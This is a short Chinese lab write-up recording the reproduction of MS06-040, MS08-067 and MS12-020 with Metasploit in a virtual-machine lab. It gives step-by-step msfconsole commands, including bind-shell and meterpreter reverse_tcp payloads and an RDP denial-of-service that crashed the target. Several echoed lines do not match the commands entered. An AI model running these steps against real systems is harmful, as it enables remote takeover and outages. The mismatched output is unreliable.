从八月份到十一月份,从Antiy到新单位,现在算是正式落下脚。开始研究一些新的东西。上周正好有点时间,就在本地复现了三个msf系列的漏洞。做了相关记录,分享出来,网上也有相关文章,可以学习参考。
Microsoft Windows Server服务远程缓冲区溢出漏洞(MS06-040)
#msfconsole
msf > search ms06-040
msf > use exploit/windows/smb/ms06_040_netapi
msf exploit(ms06_040_netapi) > set RHOST 192.168.1*1.1**
RHOST => 192.168.1*1.1**
msf exploit(ms06_040_netapi) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(ms06_040_netapi) > set LPORT 2222
LPORT => 2222
msf exploit(ms06_040_netapi) > show targets
msf exploit(ms06_040_netapi) > set target 2
msf exploit(ms06_040_netapi) > show options
msf exploit(ms06_040_netapi) > exploit
Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)
#msfconsole
msf > search ms08-067
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms06_040_netapi) > set payload windows/meterpreter/reverse_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.1*1.1**
RHOST => 192.168.1*1.1**
msf exploit(ms08_067_netapi) > set LHOST 192.168.1*1.1**
RHOST => 192.168.1*1.1**
msf exploit(ms06_040_netapi) > show targets
msf exploit(ms06_040_netapi) > set target 2
msf exploit(ms06_040_netapi) > show options
msf exploit(ms06_040_netapi) > exploit
Microsoft windows远程桌面协议RDP远程代码执行漏洞(MS12-020)
#msfconsole
msf > search ms12-020
msf exploit(windows/smb/ms08_067_netapi) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set RHOST 192.168.2*7.1**
RHOST => 192.168.2*7.1**
msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set LHOST 192.168.2*7.1**
LHOST => 192.168.2*7.1**
msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > exploit
攻击结果:
[+]192.168.27.1**:3389 - 192.168.27.1**:3389 seems down
慎用,导致蓝屏
所有攻击步骤均在虚拟机模拟环境情况下进行,请勿用作非法用途。
附:靶机镜像xp地址<链接:https://pan.baidu.com/s/1YzlDrW1ZltSyuYKGX8j58Q 提取码:3cxq >